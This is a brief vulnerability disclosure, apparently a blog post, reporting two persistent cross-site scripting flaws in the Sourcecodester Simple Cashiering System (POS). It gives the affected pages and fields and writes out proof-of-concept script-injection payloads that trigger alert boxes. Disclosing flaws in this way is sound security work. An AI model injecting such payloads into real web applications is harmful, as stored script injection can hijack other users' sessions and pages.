Multiple XSS(persistent) in Sourcecodester Simple Cashiering System (POS)

el

I found two persistent XSS in the Sourcecodester Simple Cashiering System (POS) app.

  • Vulnerable URL: http://localhost/cashiering/?page=products
  • Affected field:  all except price field
  • Payload: 6231415</td><script>alert(1)</script>  

 

 

 

  • Vulnerable URL: http://localhost/cashiering/?page=manage_account
  • Affected field:  Full Name
  • Payload: Administrator</button><script>alert("xss")</script> 

 



Comentarios

Publicar un comentario